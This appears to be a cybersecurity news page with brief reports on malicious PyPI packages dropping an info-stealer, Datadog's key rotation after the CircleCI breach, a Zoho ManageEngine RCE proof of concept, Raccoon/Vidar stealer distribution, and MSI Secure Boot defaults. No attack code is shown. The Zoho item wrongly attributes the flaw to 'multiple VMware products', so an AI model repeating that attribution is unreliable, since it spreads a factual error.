Hackerzhome

hackerzhome-logo-bg

Cybersecurity news all over the world

HACKERZHOME NEWS

January 17, 2023

Tuesday

The lolip0p virus is installed using malicious PyPi packages.

Three malicious packages containing code to install info-stealing malware on developers’ workstations have been posted by a threat actor to the PyPI (Python Package Index) repository.

The malicious packages were all uploaded between January 7 and January 12, 2023, by the same author going by the username “Lolip0p,” as found by Fortinet. “Colorslib,” “httpslib,” and “libhttps” are their names.

All three have been reported, and the PyPI has had them deleted.

The most popular repository for Python packages that programmers use to source the constituent parts of their applications is PyPI.

Unfortunately, because of its popularity, threat actors are more likely to target developers or their projects. Malicious packages are frequently uploaded under the guise of being helpful or imitating well-known projects by changing their name.

The three malicious entries had the following download counts by the time they were eliminated on Sunday, January 14 according to PyPI package stat counting service “pepy.tech.”

1. libhttps – 68 downloads

2. httpslib – 233 downloads

3. Colorslib – 248 downloads

The malicious “setup.py” file that tries to launch PowerShell and downloads the executable “Oxyz.exe” from a dubious URL is present in all three packages. This malicious software steals browsing data.

NEWS 1
The lolip0p virus is installed using malicious PyPi packages.

Breaking news

LIVE

You are not up to date!

Subscribe to our newsletter and stay updated on cybersecurity news

Datadog changes the RPM signing key after the CircleCI breach

Datadog, a cloud security company, reports that a recent CircleCI security incident resulted in the exposure of one of its RPM GPG signing keys and its passphrase.

The business said that it has not yet discovered any proof that this key has been compromised or misused.

Datadog has issued a new version of its Agent 5 RPM for CentOS/RHEL, signed with a new key, in response to CircleCI’s announcement that the threat actor took customers’ environment variables, tokens, and keys from its databases.

The business has also issued a fresh Linux install script that deletes the problematic key from the RPM and Datadog repositories.

Even if the attacker were to successfully obtain the signing key and create a malicious RPM package, according to Datadog, they would still need access to the official package repositories in order to utilize it to attack the company’s customers.

The announcement from Datadog comes after CircleCI said on Friday that one of its systems had been compromised by malware on a laptop belonging to an engineer.

Early in January, CircleCI made its initial security problem disclosure and advised all clients to rotate their secrets and tokens.

NEWS 2

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news:

January 17, 2023 /

Tuesday

Hackerzhome News

2

Have you heard ?
PoC Exploits For Serious Flaws In Well-Known WordPress Plugins Have Been Revealed Know more!

Researchers are about to disclose a proof-of-concept exploit for the serious Zoho RCE flaw.

Researchers are about to disclose a proof-of-concept exploit for the serious Zoho RCE flaw.

proof-of-concept exploit code will be made available for a serious vulnerability in multiple VMware products that permits remote code execution (RCE) without authentication.

This pre-auth RCE security hole, identified as CVE-2022-47966, is brought on by the usage of the insecure and out-of-date third-party dependency Apache Santuario.

If the SAML-based single-sign-on (SSO) is or was enabled at least once prior to the attack, successful exploitation allows unauthenticated threat actors to execute arbitrary code on ManageEngine servers.

Security experts with Horizon3’s Attack Team alerted administrators to the existence of a proof-of-concept (POC) exploit for CVE-2022-47966 on Friday.

Horizon3 intends to disclose their PoC exploit later this week, despite the fact that they have not yet provided technical specifics or shared any indicators of compromise (IOCs) that defenders might use to ascertain whether their systems have been attacked.

The next screenshot, which shows the attack being used against a vulnerable ManageEngine ServiceDesk Plus instance, was also given by the Horizon3 researchers.

NEWS 3

Raccoon and Vidar Stealers Proliferating Through a Vast Network of Cracked Fake Software

Raccoon and Vidar Stealers Proliferating Through a Vast Network of Cracked Fake Software
NEWS 4

Since early 2020, information-stealing malware like Raccoon and Vidar has been disseminated using a “large and resilient infrastructure” made up of over 250 domains.

Security company SEKOIA stated in research released earlier this month that the infection chain “uses roughly a hundred fake cracked software catalog websites that lead to multiple links before downloading the payload located on file share networks, such as GitHub.”

The domains were determined by the French cybersecurity firm to be run by a threat actor with a traffic direction system (TDS) that other cybercriminals can hire to disseminate their malware.

The attacks target people who use search engines like Google to look for cracked versions of software and video games, surfacing bogus websites on top and tricking people into downloading and running the harmful payloads by using a tactic called search engine optimization (SEO) poisoning.

A download link for the promised software is included in the poisoned result, and clicking it starts a five-stage URL redirection process that sends the user to a page with a shortened link that goes to a password-protected RAR archive file housed on GitHub and its password.

Hundreds of motherboards' Secure Boot functionality have been broken by MSI.

A default UEFI Secure Boot setting that permits any operating system image to run regardless of whether it has a false or missing signature is said to affect over 290 MSI motherboards.

This discovery was made by a Polish security researcher by the name of Dawid Potocki, who alleges that despite his attempts to contact MSI and alert them to the problem, he never got a response.

Potocki claims that the problem affects even brand-new MSI motherboard models, and numerous Intel and AMD-based MSI motherboards that employ a current firmware version.

UEFI motherboards have a security feature called Secure Boot that makes sure that only trusted (signed) software can run during the boot process.

This security mechanism is intended to stop the computer from being infected by UEFI bootkits/rootkits (1, 2, 3), as well as to alert users that their operating system has been altered after the system’s seller shipped it.

According to Potocki, the January 18, 2022 release of MSI’s firmware update version “7C02v3C” altered a default Secure Boot setting on MSI motherboards so that the system will boot even if it detects security violations.

Hundreds of motherboards' Secure Boot functionality have been broken by MSI.
NEWS 5

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news:

Leave a Reply

Your email address will not be published. Required fields are marked *